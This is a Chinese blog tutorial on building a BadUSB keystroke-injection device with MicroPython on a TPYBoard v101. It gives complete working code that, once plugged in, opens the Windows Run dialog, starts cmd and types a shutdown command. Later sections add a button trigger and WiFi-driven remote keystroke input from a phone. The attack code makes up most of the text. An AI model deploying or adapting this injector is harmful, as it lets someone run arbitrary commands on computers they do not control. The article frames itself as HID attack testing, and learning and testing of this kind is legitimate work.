轉載請注明:@小五義http://www.cnblogs.com/xiaowuyi QQ群:64770604
本文以TPYBoardv101開發板為例講解了利用micropython進行BadUSB的usb-HID設備測試的主要方法,使用mt7681模塊進行了一個簡單的實驗,實現了手機搖控鍵盤輸入的測試。
0x01引言
Micropython即運行在微控制器上的Python,只要你懂python3.x,就可以讓你像使用arduino那樣進行硬件開發。隨着micropython的發布,已經有越來越多的人研究和利用其進行項目開發。本人也進行了一些研究,發現利用python進行操作確實很方便,很簡單。目前支持micropython的開發板有很多,如pyboard、pyMagic、TPYBoard等。
Pyboard
Pymagic
TPYBoard
最近從網上搞了一塊tpyboard V101(官網www.micropython.net.cn)進行了一下研究,特別是對其自身的USB-HID功能進行了測試,令人驚喜的是,你可以在僅懂python的情況下,進行HID攻擊的姿態測試。具體TPYBoardv101的使用方法,請參見www.micropython.net.cn。
0x02 TPYBoardV101模擬鍵盤
該板子的使用方法入門,本文中略過,有興趣的可以查看其網站http://www.micropython.net.cn/support_category.php?id=2。TPYBoardv101中,在進行鍵盤模擬時,每次發送了8個字符,只要搞清楚了這8個字符的含義,就能夠進行HID模擬了。
鍵盤發送的8個字符:BYTE1 BYTE2 BYTE3 BYTE4 BYTE5 BYTE6 BYTE7 BYTE8。其中BYTE1用來實現功能鍵:
BYTE1 -- |--bit0: Left Control 按下時為1 |--bit1: Left Shift按下時為1 |--bit2: Left Alt按下時為1 |--bit3: Left GUI按下時為1 |--bit4: Right Control按下時為1 |--bit5: Right Shift按下時為1 |--bit6: Right Alt按下時為1 |--bit7: Right GUI按下時為1
BYTE3到BYTE8是具體按鍵(見0x06附件),如:
按下left shift + a ,則發送 0x02,0x00,0x04,0x00,0x00,0x00,0x00,0x00。
這里以按下left GUI+R來具體講解實現過程。
第一步:修改boot.py文件,代碼如下:
import machine
import pyb
#pyb.main('main.py') # main script to run after this one
#pyb.usb_mode('CDC+MSC') # act as a serial and a storage device
pyb.usb_mode('CDC+HID',hid=pyb.hid_keyboard)
第二步,修改main.py文件,代碼如下:
# main.py -- put your code here!
hid=pyb.USB_HID()
def release_key_once():
buf = bytearray(8) # report is 8 bytes long
buf[2] = 0
hid.send(buf) # key released
pyb.delay(10)
def press_key_once(key):
buf = bytearray(8) # report is 8 bytes long
buf[2] = key
hid.send(buf) # key released
pyb.delay(10)
def press_2key(key1,key2):
buf = bytearray(8) # report is 8 bytes long
buf[0] = key1
buf[2] = key2
hid.send(buf) # key released
pyb.delay(10)
def release_2key():
buf = bytearray(8) # report is 8 bytes long
buf[0] = 0
buf[2] = 0
hid.send(buf) # key released
pyb.delay(10)
pyb.delay(1000) #開始加入1秒延時
press_2key(0x08,0x15)#具體鍵值見附錄部分
release_2key()
第三步,安全退出TPYBoardv101,然后按一下RST鍵,可以看到一秒后“運行”窗口彈出。
0x03 簡單的HID測試
測試打開“運行”窗口,輸入cmd,然后彈出cmd后,輸入shutdown -s -t 60 ,即60秒后自動關機。
Main.py的代碼如下:
# main.py -- put your code here!
hid=pyb.USB_HID()
def release_key_once():
buf = bytearray(8) # report is 8 bytes long
buf[2] = 0
hid.send(buf) # key released
pyb.delay(10)
def press_key_once(key):
buf = bytearray(8) # report is 8 bytes long
buf[2] = key
hid.send(buf) # key released
pyb.delay(10)
def press_2key(key1,key2):
buf = bytearray(8) # report is 8 bytes long
buf[0] = key1
buf[2] = key2
hid.send(buf) # key released
pyb.delay(10)
def release_2key():
buf = bytearray(8) # report is 8 bytes long
buf[0] = 0
buf[2] = 0
hid.send(buf) # key released
pyb.delay(10)
pyb.delay(1000) #開始加入1秒延時
press_2key(0x08,0x15)#具體鍵值見附錄部分
release_2key()
pyb.delay(100)
a=[0x06,0x10,0x07,0x28] #cmd+enter
for i in a:
press_key_once(i)
release_key_once()
pyb.delay(1000)
#shutdown -s -t 60 + enter
a=[0x16,0x0b,0x18,0x17,0x07,0x12,0x1a,0x11,0x2c,0x2d,0x16,0x2c,0x2d,0x17,0x2c,0x23,0x27,0x28]
for i in a:
press_key_once(i)
release_key_once()
pyb.delay(1000)
程序運行的效果是:當開發板插入電腦后,會首先彈出“運行”窗口,然后在該窗口里輸入cmd,此時彈出cmd,並在其中輸入shutdown -s -t 60和回車,然后電腦在1分鍾后關機。
0x04 DIY一鍵關機
TPYBoardv101帶着一個usr按鍵,可以利用這個按鍵來制作一鍵關機功能。當板子程序運行后,按下usr按鍵,產生中斷,led3閃一下,進行關機操作。具體代碼如下:
# main.py -- put your code here!
import pyb
FLAG=0 #flag標記,當為1時,關機
def release_key_once():
buf = bytearray(8) # report is 8 bytes long
buf[2] = 0
hid.send(buf) # key released
pyb.delay(10)
def press_key_once(key):
buf = bytearray(8) # report is 8 bytes long
buf[2] = key
hid.send(buf) # key released
pyb.delay(10)
def press_2key(key1,key2):
buf = bytearray(8) # report is 8 bytes long
buf[0] = key1
buf[2] = key2
hid.send(buf) # key released
pyb.delay(10)
def release_2key():
buf = bytearray(8) # report is 8 bytes long
buf[0] = 0
buf[2] = 0
hid.send(buf) # key released
pyb.delay(10)
def shutdownpc():
global FLAG
pyb.LED(3).on()
FLAG=1
pyb.delay(300)
pyb.LED(3).off()
hid=pyb.USB_HID()
sw=pyb.Switch()
sw.callback(shutdownpc)
while(1): #led2閃爍表示板子已經正常工作
pyb.LED(2).toggle()
pyb.delay(300)
print(FLAG)
if FLAG==1:
pyb.delay(1000) #開始加入1秒延時
press_2key(0x08,0x15)#具體鍵值見附錄部分
release_2key()
pyb.delay(100)
a=[0x06,0x10,0x07,0x28] #cmd+enter
for i in a:
press_key_once(i)
release_key_once()
pyb.delay(1000)
#shutdown -s -t 60 + enter
a=[0x16,0x0b,0x18,0x17,0x07,0x12,0x1a,0x11,0x2c,0x2d,0x16,0x2c,0x2d,0x17,0x2c,0x23,0x27,0x28]
for i in a:
press_key_once(i)
release_key_once()
pyb.delay(1000)
FLAG=0
視頻演示:
0x05 用手機搖控鍵盤輸入
這個實驗中,我使用了MT7681wifi模塊,該模塊可以直接進行串口透傳。將MT7681與TPYBoardv101進行連接,接線示意圖,見下圖。這里用的是TPYBoardv101的UART3,串口波特率115200。具體代碼如下:
# main.py -- put your code here!
import pyb
FLAG=0
def release_key_once():
buf = bytearray(8) # report is 8 bytes long
buf[2] = 0
hid.send(buf) # key released
pyb.delay(10)
def press_key_once(key):
buf = bytearray(8) # report is 8 bytes long
buf[2] = key
hid.send(buf) # key released
pyb.delay(10)
def press_2key(key1,key2):
buf = bytearray(8) # report is 8 bytes long
buf[0] = key1
buf[2] = key2
hid.send(buf) # key released
pyb.delay(10)
def release_2key():
buf = bytearray(8) # report is 8 bytes long
buf[0] = 0
buf[2] = 0
hid.send(buf) # key released
pyb.delay(10)
def shutdownpc():
global FLAG
pyb.LED(3).on()
FLAG=1
pyb.delay(1000)
pyb.LED(3).off()
def getchars():
global FLAG
pyb.LED(3).on()
FLAG=2
pyb.delay(1000)
pyb.LED(3).off()
hid=pyb.USB_HID()
sw=pyb.Switch()
sw.callback(shutdownpc)
u1=pyb.UART(3,115200)
u1.init(115200, bits=8, parity=None, stop=1)
u1.write('Hello world!')
buf=''
#print(buf)
while(1): #led2閃爍表示板子已經正常工作
buf=u1.readline()
print(buf)
if buf==b's':
getchars()
pyb.LED(2).toggle()
pyb.delay(1300)
print(FLAG)
if FLAG==1:
pyb.delay(1000) #開始加入1秒延時
press_2key(0x08,0x15)#具體鍵值見附錄部分
release_2key()
pyb.delay(100)
a=[0x06,0x10,0x07,0x28] #cmd+enter
for i in a:
press_key_once(i)
release_key_once()
pyb.delay(1000)
#shutdown -s -t 60 + enter
a=[0x16,0x0b,0x18,0x17,0x07,0x12,0x1a,0x11,0x2c,0x2d,0x16,0x2c,0x2d,0x17,0x2c,0x23,0x27,0x28]
for i in a:
press_key_once(i)
release_key_once()
pyb.delay(1000)
FLAG=0
if FLAG==2:
pyb.delay(1000) #開始加入1秒延時
press_2key(0x08,0x15)#具體鍵值見附錄部分
release_2key()
pyb.delay(100)
a=[0x11,0x12,0x17,0x08,0x13,0x04,0x07,0x28] #notepad+enter
for i in a:
press_key_once(i)
release_key_once()
pyb.delay(1000)
FLAG=0
到這一步,可以看到,手機就像一個搖控鍵盤一樣,可以直接來控制鍵盤了。只需要在程序中再豐富一下,就可以做個很不錯的手機鍵盤出來。同時,因為可以通過串口返回數據,所以可以在電腦端寫個上位機,這樣就可以把電腦操作的返回值返回回來。具體的擴展功能大家自己想吧,就只說到這里了。
視頻演示:
0x06附件
micropython的主要鍵值如下:
#define KEY_NONE 0x00 #define KEY_ERRORROLLOVER 0x01 #define KEY_POSTFAIL 0x02 #define KEY_ERRORUNDEFINED 0x03 #define KEY_A 0x04 #define KEY_B 0x05 #define KEY_C 0x06 #define KEY_D 0x07 #define KEY_E 0x08 #define KEY_F 0x09 #define KEY_G 0x0A #define KEY_H 0x0B #define KEY_I 0x0C #define KEY_J 0x0D #define KEY_K 0x0E #define KEY_L 0x0F #define KEY_M 0x10 #define KEY_N 0x11 #define KEY_O 0x12 #define KEY_P 0x13 #define KEY_Q 0x14 #define KEY_R 0x15 #define KEY_S 0x16 #define KEY_T 0x17 #define KEY_U 0x18 #define KEY_V 0x19 #define KEY_W 0x1A #define KEY_X 0x1B #define KEY_Y 0x1C #define KEY_Z 0x1D #define KEY_1_EXCLAMATION_MARK 0x1E #define KEY_2_AT 0x1F #define KEY_3_NUMBER_SIGN 0x20 #define KEY_4_DOLLAR 0x21 #define KEY_5_PERCENT 0x22 #define KEY_6_CARET 0x23 #define KEY_7_AMPERSAND 0x24 #define KEY_8_ASTERISK 0x25 #define KEY_9_OPARENTHESIS 0x26 #define KEY_0_CPARENTHESIS 0x27 #define KEY_ENTER 0x28 #define KEY_ESCAPE 0x29 #define KEY_BACKSPACE 0x2A #define KEY_TAB 0x2B #define KEY_SPACEBAR 0x2C #define KEY_MINUS_UNDERSCORE 0x2D #define KEY_EQUAL_PLUS 0x2E #define KEY_OBRACKET_AND_OBRACE 0x2F #define KEY_CBRACKET_AND_CBRACE 0x30 #define KEY_BACKSLASH_VERTICAL_BAR 0x31 #define KEY_NONUS_NUMBER_SIGN_TILDE 0x32 #define KEY_SEMICOLON_COLON 0x33 #define KEY_SINGLE_AND_DOUBLE_QUOTE 0x34 #define KEY_GRAVE ACCENT AND TILDE 0x35 #define KEY_COMMA_AND_LESS 0x36 #define KEY_DOT_GREATER 0x37 #define KEY_SLASH_QUESTION 0x38 #define KEY_CAPS LOCK 0x39 #define KEY_F1 0x3A #define KEY_F2 0x3B #define KEY_F3 0x3C #define KEY_F4 0x3D #define KEY_F5 0x3E #define KEY_F6 0x3F #define KEY_F7 0x40 #define KEY_F8 0x41 #define KEY_F9 0x42 #define KEY_F10 0x43 #define KEY_F11 0x44 #define KEY_F12 0x45 #define KEY_PRINTSCREEN 0x46 #define KEY_SCROLL LOCK 0x47 #define KEY_PAUSE 0x48 #define KEY_INSERT 0x49 #define KEY_HOME 0x4A #define KEY_PAGEUP 0x4B #define KEY_DELETE 0x4C #define KEY_END1 0x4D #define KEY_PAGEDOWN 0x4E #define KEY_RIGHTARROW 0x4F #define KEY_LEFTARROW 0x50 #define KEY_DOWNARROW 0x51 #define KEY_UPARROW 0x52 #define KEY_KEYPAD_NUM_LOCK_AND_CLEAR 0x53 #define KEY_KEYPAD_SLASH 0x54 #define KEY_KEYPAD_ASTERIKS 0x55 #define KEY_KEYPAD_MINUS 0x56 #define KEY_KEYPAD_PLUS 0x57 #define KEY_KEYPAD_ENTER 0x58 #define KEY_KEYPAD_1_END 0x59 #define KEY_KEYPAD_2_DOWN_ARROW 0x5A #define KEY_KEYPAD_3_PAGEDN 0x5B #define KEY_KEYPAD_4_LEFT_ARROW 0x5C #define KEY_KEYPAD_5 0x5D #define KEY_KEYPAD_6_RIGHT_ARROW 0x5E #define KEY_KEYPAD_7_HOME 0x5F #define KEY_KEYPAD_8_UP_ARROW 0x60 #define KEY_KEYPAD_9_PAGEUP 0x61 #define KEY_KEYPAD_0_INSERT 0x62 #define KEY_KEYPAD_DECIMAL_SEPARATOR_DELETE 0x63 #define KEY_NONUS_BACK_SLASH_VERTICAL_BAR 0x64 #define KEY_APPLICATION 0x65 #define KEY_POWER 0x66 #define KEY_KEYPAD_EQUAL 0x67 #define KEY_F13 0x68 #define KEY_F14 0x69 #define KEY_F15 0x6A #define KEY_F16 0x6B #define KEY_F17 0x6C #define KEY_F18 0x6D #define KEY_F19 0x6E #define KEY_F20 0x6F #define KEY_F21 0x70 #define KEY_F22 0x71 #define KEY_F23 0x72 #define KEY_F24 0x73 #define KEY_EXECUTE 0x74 #define KEY_HELP 0x75 #define KEY_MENU 0x76 #define KEY_SELECT 0x77 #define KEY_STOP 0x78 #define KEY_AGAIN 0x79 #define KEY_UNDO 0x7A #define KEY_CUT 0x7B #define KEY_COPY 0x7C #define KEY_PASTE 0x7D #define KEY_FIND 0x7E #define KEY_MUTE 0x7F #define KEY_VOLUME_UP 0x80 #define KEY_VOLUME_DOWN 0x81 #define KEY_LOCKING_CAPS_LOCK 0x82 #define KEY_LOCKING_NUM_LOCK 0x83 #define KEY_LOCKING_SCROLL_LOCK 0x84 #define KEY_KEYPAD_COMMA 0x85 #define KEY_KEYPAD_EQUAL_SIGN 0x86 #define KEY_INTERNATIONAL1 0x87 #define KEY_INTERNATIONAL2 0x88 #define KEY_INTERNATIONAL3 0x89 #define KEY_INTERNATIONAL4 0x8A #define KEY_INTERNATIONAL5 0x8B #define KEY_INTERNATIONAL6 0x8C #define KEY_INTERNATIONAL7 0x8D #define KEY_INTERNATIONAL8 0x8E #define KEY_INTERNATIONAL9 0x8F #define KEY_LANG1 0x90 #define KEY_LANG2 0x91 #define KEY_LANG3 0x92 #define KEY_LANG4 0x93 #define KEY_LANG5 0x94 #define KEY_LANG6 0x95 #define KEY_LANG7 0x96 #define KEY_LANG8 0x97 #define KEY_LANG9 0x98 #define KEY_ALTERNATE_ERASE 0x99 #define KEY_SYSREQ 0x9A #define KEY_CANCEL 0x9B #define KEY_CLEAR 0x9C #define KEY_PRIOR 0x9D #define KEY_RETURN 0x9E #define KEY_SEPARATOR 0x9F #define KEY_OUT 0xA0 #define KEY_OPER 0xA1 #define KEY_CLEAR_AGAIN 0xA2 #define KEY_CRSEL 0xA3 #define KEY_EXSEL 0xA4 #define KEY_KEYPAD_00 0xB0 #define KEY_KEYPAD_000 0xB1 #define KEY_THOUSANDS_SEPARATOR 0xB2 #define KEY_DECIMAL_SEPARATOR 0xB3 #define KEY_CURRENCY_UNIT 0xB4 #define KEY_CURRENCY_SUB_UNIT 0xB5 #define KEY_KEYPAD_OPARENTHESIS 0xB6 #define KEY_KEYPAD_CPARENTHESIS 0xB7 #define KEY_KEYPAD_OBRACE 0xB8 #define KEY_KEYPAD_CBRACE 0xB9 #define KEY_KEYPAD_TAB 0xBA #define KEY_KEYPAD_BACKSPACE 0xBB #define KEY_KEYPAD_A 0xBC #define KEY_KEYPAD_B 0xBD #define KEY_KEYPAD_C 0xBE #define KEY_KEYPAD_D 0xBF #define KEY_KEYPAD_E 0xC0 #define KEY_KEYPAD_F 0xC1 #define KEY_KEYPAD_XOR 0xC2 #define KEY_KEYPAD_CARET 0xC3 #define KEY_KEYPAD_PERCENT 0xC4 #define KEY_KEYPAD_LESS 0xC5 #define KEY_KEYPAD_GREATER 0xC6 #define KEY_KEYPAD_AMPERSAND 0xC7 #define KEY_KEYPAD_LOGICAL_AND 0xC8 #define KEY_KEYPAD_VERTICAL_BAR 0xC9 #define KEY_KEYPAD_LOGIACL_OR 0xCA #define KEY_KEYPAD_COLON 0xCB #define KEY_KEYPAD_NUMBER_SIGN 0xCC #define KEY_KEYPAD_SPACE 0xCD #define KEY_KEYPAD_AT 0xCE #define KEY_KEYPAD_EXCLAMATION_MARK 0xCF #define KEY_KEYPAD_MEMORY_STORE 0xD0 #define KEY_KEYPAD_MEMORY_RECALL 0xD1 #define KEY_KEYPAD_MEMORY_CLEAR 0xD2 #define KEY_KEYPAD_MEMORY_ADD 0xD3 #define KEY_KEYPAD_MEMORY_SUBTRACT 0xD4 #define KEY_KEYPAD_MEMORY_MULTIPLY 0xD5 #define KEY_KEYPAD_MEMORY_DIVIDE 0xD6 #define KEY_KEYPAD_PLUSMINUS 0xD7 #define KEY_KEYPAD_CLEAR 0xD8 #define KEY_KEYPAD_CLEAR_ENTRY 0xD9 #define KEY_KEYPAD_BINARY 0xDA #define KEY_KEYPAD_OCTAL 0xDB #define KEY_KEYPAD_DECIMAL 0xDC #define KEY_KEYPAD_HEXADECIMAL 0xDD #define KEY_LEFTCONTROL 0xE0 #define KEY_LEFTSHIFT 0xE1 #define KEY_LEFTALT 0xE2 #define KEY_LEFT_GUI 0xE3 #define KEY_RIGHTCONTROL 0xE4 #define KEY_RIGHTSHIFT 0xE5 #define KEY_RIGHTALT 0xE6 #define KEY_RIGHT_GUI 0xE7